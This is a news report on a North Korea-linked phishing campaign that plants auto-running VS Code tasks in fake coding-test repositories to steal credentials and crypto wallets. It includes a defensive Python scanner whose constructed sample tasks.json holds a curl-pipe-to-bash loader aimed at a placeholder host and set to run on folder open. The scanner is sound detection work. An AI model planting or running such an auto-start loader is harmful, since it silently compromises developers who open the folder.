North Korea-linked hackers are using recruitment-themed phishing emails and malicious GitHub repositories to target nearly 100 organizations across finance, cryptocurrency, education and technology, according to a technical analysis by Proofpoint. The campaign, tracked as UNK_DeadDrop, sent more than 250 emails in six weeks and sought to steal wallet credentials and data from developers on Windows, macOS and Linux.
KEY FACTS
- Targets: Nearly 100 organizations were contacted, most of them in the U.S.
- Delivery: Emails linked to GitHub repositories posing as coding tasks or open-source code reviews.
- Payload: The malware installed a fake VS Code extension and used Overlord-based loaders.
- Goal: The operation aimed to steal credentials and wallet data.
The emails instructed recipients to clone a repository and open it in VS Code or Cursor, which triggered operating-system-specific loaders. Proofpoint said the infection chain could run without further user interaction when a project used the VS Code folderOpen technique: a task in the repository's .vscode/tasks.json configured with "runOn": "folderOpen" starts automatically as soon as the folder is opened in a trusted workspace, and Cursor, a VS Code fork, reads the same file. The only click the attacker needs is the victim accepting the Workspace Trust prompt, which developers routinely do for a repository they expect to build.
The Linux and macOS paths led to a custom build of the open-source Overlord framework, while the Windows path used VBScript to launch a CMD file that installed the extension. The payloads collected browser wallet extensions, stored credentials and desktop wallet application data, then sent the results to a remote server.
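A practical pre-open check for the folderOpen technique described above, added here as an example and not taken from the Proofpoint report or from any campaign artefact: run it against a freshly cloned repository before opening the folder in VS Code or Cursor. It parses .vscode/tasks.json (which VS Code reads as JSON with comments and trailing commas), reports every task whose runOptions.runOn is folderOpen, and, going a step beyond the article, also surfaces the per-platform command overrides (windows/osx/linux) that let a single tasks.json stage a different loader on each operating system. The sample tasks.json it scans is constructed for the demonstration; the URL in it is a placeholder, not a real indicator.

```python
"""Flag VS Code tasks that would start automatically when a cloned folder is opened.

Added example; assumes the repository is already cloned locally and has NOT been
opened in VS Code or Cursor yet. The only signal checked is `.vscode/tasks.json`
with a task whose `runOptions.runOn` is `folderOpen`. Workspace Trust normally
gates such tasks, so treat any hit as a reason to keep the folder in restricted
mode (or not open it at all).
"""
import json
import os
import re
import tempfile
from typing import Any

AUTO_RUN = "folderOpen"

# Constructed sample (not a real artefact) showing the auto-run pattern together
# with a Windows override; the URL is a placeholder.
SAMPLE_TASKS_JSON = r'''{
    // build helper
    "version": "2.0.0",
    "tasks": [
        {
            "label": "Build project",
            "type": "shell",
            "command": "bash",
            "args": ["-c", "curl -s http://example.invalid/stage | bash"],
            "windows": { "command": "cmd", "args": ["/c", "setup.cmd"] },
            "runOptions": { "runOn": "folderOpen" },
        },
        { "label": "test", "type": "shell", "command": "npm test" }
    ]
}'''


def _load_jsonc(text: str) -> Any:
    """VS Code config files are JSONC: strip block comments, line comments that
    start a line or follow whitespace, and trailing commas before parsing."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"(^|\s)//.*$", r"\1", text, flags=re.M)
    text = re.sub(r",\s*([}\]])", r"\1", text)
    return json.loads(text)


def describe_task(task: dict) -> dict:
    """Flatten what a reviewer needs: label, the command line VS Code would run,
    and any per-platform overrides (windows/osx/linux)."""
    def cmdline(block: dict) -> str:
        cmd = block.get("command", "")
        args = block.get("args", [])
        return " ".join([str(cmd)] + [str(a) for a in args]).strip()

    info = {"label": task.get("label", "<unnamed>"), "command": cmdline(task)}
    for plat in ("windows", "osx", "linux"):
        if isinstance(task.get(plat), dict):
            info[plat] = cmdline(task[plat])
    return info


def find_auto_tasks(repo_root: str) -> list[dict]:
    """Return every task under repo_root/.vscode/tasks.json that VS Code would
    start on folder open (runOptions.runOn == "folderOpen")."""
    path = os.path.join(repo_root, ".vscode", "tasks.json")
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8-sig") as fh:
        cfg = _load_jsonc(fh.read())
    if not isinstance(cfg, dict):
        return []
    hits = []
    for task in cfg.get("tasks", []):
        if not isinstance(task, dict):
            continue
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on == AUTO_RUN:
            hits.append(describe_task(task))
    return hits


def write_sample_repo() -> str:
    """Create a throwaway 'cloned repo' containing the constructed tasks.json."""
    root = tempfile.mkdtemp(prefix="deaddrop-demo-")
    os.makedirs(os.path.join(root, ".vscode"))
    with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_TASKS_JSON)
    return root


if __name__ == "__main__":
    repo = write_sample_repo()
    for hit in find_auto_tasks(repo):
        print(f"AUTO-RUN task {hit['label']!r}: {hit['command']}")
        for plat in ("windows", "osx", "linux"):
            if plat in hit:
                print(f"  {plat} override: {hit[plat]}")
```

Point the script at the clone with `find_auto_tasks("/path/to/clone")` instead of the sample repo. A hit does not prove malice (legitimate projects use folderOpen for watchers), but a task that invokes curl, PowerShell, VBScript or a .cmd file from the repository on first open is exactly the pattern the article describes and warrants opening the folder in restricted mode, if at all.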
Researchers said the campaign marked a shift from the group's earlier LinkedIn-based social engineering to larger email-based operations. They also said the group had previously used a Windows Go binary of Overlord but had moved to the new approach, likely to reduce detection.
Separately, Yeeth Security said it found three malicious VS Code extensions on the official marketplace that were disguised as Jupyter Notebook tools and operated as a multi-stage backdoor. The disclosure described SharePoint and Microsoft Graph API channels used for command and control and file theft, along with Windows, Linux and macOS components.
WHY IT MATTERS
The findings show that developer workflows remain a useful entry point for attackers seeking credentials and cryptocurrency data. They also suggest North Korea-linked groups are broadening their delivery methods to scale phishing and make malicious code look like ordinary development tools.